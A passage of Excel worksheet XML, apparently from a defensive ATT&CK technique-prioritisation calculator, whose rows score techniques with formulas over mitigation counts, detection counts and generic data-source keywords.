        <v>1843</v>
      </c>
      <c r="U517" s="51">
        <v>0</v>
      </c>
      <c r="V517" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W517">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X517">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y517">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z517">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA517">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB517">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC517" s="30"/>
      <c r="AD517" s="25" t="str" cm="1">
        <f t="array" ref="AD517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE517" s="25">
        <f>IF(AD517="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF517" s="25" t="str" cm="1">
        <f t="array" ref="AF517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG517" s="25">
        <f>IF(AF517="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH517" s="25" t="str" cm="1">
        <f t="array" ref="AH517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI517" s="25">
        <f>IF(AH517="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ517" s="25" t="str" cm="1">
        <f t="array" ref="AJ517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK517" s="25">
        <f>IF(AJ517="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL517" s="25" t="str" cm="1">
        <f t="array" ref="AL517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM517" s="25">
        <f>IF(AL517="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN517" s="64">
        <v>0</v>
      </c>
      <c r="AO517" s="51"/>
      <c r="AP517" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ517" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR517" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS517" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT517" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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18" spans="1:47">
      <c r="A518" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B518" s="25">
        <f>SUM(H518,M518,V518)*(1+SUM(AE518,AG518,AI518,AK518,AM518))</f>
        <v>0.1</v>
      </c>
      <c r="C518" s="25" t="s">
        <v>1844</v>
      </c>
      <c r="D518" s="25" t="s">
        <v>1845</v>
      </c>
      <c r="E518" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F518" s="51">
        <v>1</v>
      </c>
      <c r="G518" s="51">
        <v>1</v>
      </c>
      <c r="H518" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I518">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J518">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K518">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L518">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M518" s="25">
        <v>0</v>
      </c>
      <c r="N518" s="51">
        <v>0</v>
      </c>
      <c r="O518" s="51">
        <v>0</v>
      </c>
      <c r="P518" s="51">
        <v>0</v>
      </c>
      <c r="Q518" s="51">
        <v>0</v>
      </c>
      <c r="R518" s="51"/>
      <c r="S518" s="51">
        <v>0</v>
      </c>
      <c r="T518" s="52" t="s">
        <v>1846</v>
      </c>
      <c r="U518" s="51">
        <v>0</v>
      </c>
      <c r="V518" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W518">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X518">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y518">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z518">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA518">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB518">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC518" s="30"/>
      <c r="AD518" s="25" t="str" cm="1">
        <f t="array" ref="AD518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE518" s="25">
        <f>IF(AD518="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF518" s="25" t="str" cm="1">
        <f t="array" ref="AF518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG518" s="25">
        <f>IF(AF518="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH518" s="25" t="str" cm="1">
        <f t="array" ref="AH518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI518" s="25">
        <f>IF(AH518="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ518" s="25" t="str" cm="1">
        <f t="array" ref="AJ518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK518" s="25">
        <f>IF(AJ518="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL518" s="25" t="str" cm="1">
        <f t="array" ref="AL518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM518" s="25">
        <f>IF(AL518="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN518" s="64">
        <v>0</v>
      </c>
      <c r="AO518" s="51"/>
      <c r="AP518" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ518" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR518" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS518" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT518" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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19" spans="1:47">
      <c r="A519" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B519" s="25">
        <f>SUM(H519,M519,V519)*(1+SUM(AE519,AG519,AI519,AK519,AM519))</f>
        <v>0.1</v>
      </c>
      <c r="C519" s="25" t="s">
        <v>1847</v>
      </c>
      <c r="D519" s="25" t="s">
        <v>1848</v>
      </c>
      <c r="E519" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F519" s="51">
        <v>1</v>
      </c>
      <c r="G519" s="51">
        <v>1</v>
      </c>
      <c r="H519" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I519">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J519">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K519">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L519">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M519" s="25">
        <v>0</v>
      </c>
      <c r="N519" s="51">
        <v>0</v>
      </c>
      <c r="O519" s="51">
        <v>0</v>
      </c>
      <c r="P519" s="51">
        <v>0</v>
      </c>
      <c r="Q519" s="51">
        <v>0</v>
      </c>
      <c r="R519" s="51"/>
      <c r="S519" s="51">
        <v>0</v>
      </c>
      <c r="T519" s="52" t="s">
        <v>1849</v>
      </c>
      <c r="U519" s="51">
        <v>0</v>
      </c>
      <c r="V519" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W519">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X519">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y519">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z519">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA519">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB519">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC519" s="30"/>
      <c r="AD519" s="25" t="str" cm="1">
        <f t="array" ref="AD519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE519" s="25">
        <f>IF(AD519="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF519" s="25" t="str" cm="1">
        <f t="array" ref="AF519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG519" s="25">
        <f>IF(AF519="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH519" s="25" t="str" cm="1">
        <f t="array" ref="AH519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI519" s="25">
        <f>IF(AH519="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ519" s="25" t="str" cm="1">
        <f t="array" ref="AJ519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK519" s="25">
        <f>IF(AJ519="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL519" s="25" t="str" cm="1">
        <f t="array" ref="AL519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM519" s="25">
        <f>IF(AL519="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN519" s="64">
        <v>0</v>
      </c>
      <c r="AO519" s="51"/>
      <c r="AP519" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ519" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR519" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS519" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT519" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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20" spans="1:47">
      <c r="A520" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B520" s="25">
        <f>SUM(H520,M520,V520)*(1+SUM(AE520,AG520,AI520,AK520,AM520))</f>
        <v>0.1</v>
      </c>
      <c r="C520" s="25" t="s">
        <v>1850</v>
      </c>
      <c r="D520" s="25" t="s">
        <v>1851</v>
      </c>
      <c r="E520" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F520" s="51">
        <v>1</v>
      </c>
      <c r="G520" s="51">
        <v>1</v>
      </c>
      <c r="H520" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I520">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J520">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K520">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L520">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M520" s="25">
        <v>0</v>
      </c>
      <c r="N520" s="51">
        <v>0</v>
      </c>
      <c r="O520" s="51">
        <v>0</v>
      </c>
      <c r="P520" s="51">
        <v>0</v>
      </c>
      <c r="Q520" s="51">
        <v>0</v>
      </c>
      <c r="R520" s="51"/>
      <c r="S520" s="51">
        <v>0</v>
      </c>
      <c r="T520" s="52" t="s">
        <v>1852</v>
      </c>
      <c r="U520" s="51">
        <v>0</v>
      </c>
      <c r="V520" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W520">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X520">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y520">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z520">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA520">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB520">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC520" s="30"/>
      <c r="AD520" s="25" t="str" cm="1">
        <f t="array" ref="AD520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE520" s="25">
        <f>IF(AD520="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF520" s="25" t="str" cm="1">
        <f t="array" ref="AF520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG520" s="25">
        <f>IF(AF520="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH520" s="25" t="str" cm="1">
        <f t="array" ref="AH520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI520" s="25">
        <f>IF(AH520="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ520" s="25" t="str" cm="1">
        <f t="array" ref="AJ520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK520" s="25">
        <f>IF(AJ520="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL520" s="25" t="str" cm="1">
        <f t="array" ref="AL520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM520" s="25">
        <f>IF(AL520="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN520" s="64">
        <v>0</v>
      </c>
      <c r="AO520" s="51"/>
      <c r="AP520" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ520" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR520" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS520" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT520" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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21" spans="1:47">
      <c r="A521" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B521" s="25">
        <f>SUM(H521,M521,V521)*(1+SUM(AE521,AG521,AI521,AK521,AM521))</f>
        <v>0.1</v>
      </c>
      <c r="C521" s="25" t="s">
        <v>1853</v>
      </c>
      <c r="D521" s="25" t="s">
        <v>1854</v>
      </c>
      <c r="E521" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F521" s="51">
        <v>1</v>
      </c>
      <c r="G521" s="51">
        <v>1</v>
      </c>
      <c r="H521" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I521">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J521">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K521">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L521">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M521" s="25">
        <v>0</v>
      </c>
      <c r="N521" s="51">
        <v>0</v>
      </c>
      <c r="O521" s="51">
        <v>0</v>
      </c>
      <c r="P521" s="51">
        <v>0</v>
      </c>
      <c r="Q521" s="51">
        <v>0</v>
      </c>
      <c r="R521" s="51"/>
      <c r="S521" s="51">
        <v>0</v>
      </c>
      <c r="T521" s="51"/>
      <c r="U521" s="51">
        <v>0</v>
      </c>
      <c r="V521" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W521">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X521">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y521">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z521">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA521">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB521">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC521" s="30"/>
      <c r="AD521" s="25" t="str" cm="1">
        <f t="array" ref="AD521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE521" s="25">
        <f>IF(AD521="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF521" s="25" t="str" cm="1">
        <f t="array" ref="AF521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG521" s="25">
        <f>IF(AF521="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH521" s="25" t="str" cm="1">
        <f t="array" ref="AH521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI521" s="25">
        <f>IF(AH521="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ521" s="25" t="str" cm="1">
        <f t="array" ref="AJ521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK521" s="25">
        <f>IF(AJ521="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
